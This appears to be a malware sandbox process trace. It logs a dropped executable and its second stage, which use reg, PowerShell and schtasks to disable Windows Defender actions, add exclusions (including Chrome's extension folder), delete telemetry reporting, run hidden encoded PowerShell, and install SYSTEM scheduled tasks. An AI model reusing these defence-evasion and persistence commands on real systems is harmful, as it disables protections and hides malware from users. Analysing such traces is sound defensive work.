\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:64
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz\WGDDUCEGaylPoGy\NdyFUwl.exeC:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz\WGDDUCEGaylPoGy\NdyFUwl.exe nw /bZsite_idXqI 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:380
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3576
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AwpsUBzCgDaiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AwpsUBzCgDaiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dKjZUQIlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dKjZUQIlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qbZbgwPoqPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qbZbgwPoqPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rqFQbjXchIPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rqFQbjXchIPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QlFQjDHYbuPKXdVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QlFQjDHYbuPKXdVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PIXVXvKWgaYNyGUO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PIXVXvKWgaYNyGUO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwpsUBzCgDaiC" /t REG_DWORD /d 0 /reg:323⤵PID:4892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwpsUBzCgDaiC" /t REG_DWORD /d 0 /reg:324⤵PID:4632
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwpsUBzCgDaiC" /t REG_DWORD /d 0 /reg:643⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR" /t REG_DWORD /d 0 /reg:323⤵PID:3728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR" /t REG_DWORD /d 0 /reg:643⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dKjZUQIlU" /t REG_DWORD /d 0 /reg:323⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dKjZUQIlU" /t REG_DWORD /d 0 /reg:643⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qbZbgwPoqPUn" /t REG_DWORD /d 0 /reg:323⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qbZbgwPoqPUn" /t REG_DWORD /d 0 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rqFQbjXchIPU2" /t REG_DWORD /d 0 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rqFQbjXchIPU2" /t REG_DWORD /d 0 /reg:643⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QlFQjDHYbuPKXdVB /t REG_DWORD /d 0 /reg:323⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QlFQjDHYbuPKXdVB /t REG_DWORD /d 0 /reg:643⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz /t REG_DWORD /d 0 /reg:323⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz /t REG_DWORD /d 0 /reg:643⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PIXVXvKWgaYNyGUO /t REG_DWORD /d 0 /reg:323⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PIXVXvKWgaYNyGUO /t REG_DWORD /d 0 /reg:643⤵PID:880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfMiVNwcu" /SC once /ST 03:14:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfMiVNwcu"2⤵PID:3212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfMiVNwcu"2⤵PID:3580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yJubGAGSNRimfkjrP" /SC once /ST 03:27:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PIXVXvKWgaYNyGUO\rwYIIfgvYPmjmuC\UVMjdTq.exe\" aG /IMsite_idCUf 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yJubGAGSNRimfkjrP"2⤵PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4628
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1784
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:624
-
C:\Windows\Temp\PIXVXvKWgaYNyGUO\rwYIIfgvYPmjmuC\UVMjdTq.exeC:\Windows\Temp\PIXVXvKWgaYNyGUO\rwYIIfgvYPmjmuC\UVMjdTq.exe aG /IMsite_idCUf 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "byGghvRStpVIiJkbMC"2⤵PID:3792
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3896
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1888
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dKjZUQIlU\QhvhUE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gwDSsSBQbdgEwRb" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwDSsSBQbdgEwRb2" /F /xml "C:\Program Files (x86)\dKjZUQIlU\lUEmPGd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gwDSsSBQbdgEwRb"2⤵PID:4760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwDSsSBQbdgEwRb"2⤵PID:2556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pgqMFJfqoFoibm" /F /xml "C:\Program Files (x86)\rqFQbjXchIPU2\vhVqaYM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vsZNeWUpYGuYm2" /F /xml "C:\ProgramData\QlFQjDHYbuPKXdVB\atKdOWy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kihRQzzGbXOLIIcQY2" /F /xml "C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR\UlhkHix.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TSTkrodEjTFNsjMNPcb2" /F /xml "C:\Program Files (x86)\AwpsUBzCgDaiC\wBSsQcq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "djzsCuSYobhMFkMDx" /SC once /ST 02:30:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PIXVXvKWgaYNyGUO\KZjcCnKh\bxdnXWa.dll\",#1 /dosite_idmTY 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "djzsCuSYobhMFkMDx"2⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3008
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3744
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2672
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yJubGAGSNRimfkjrP"2⤵PID:2096
-
-
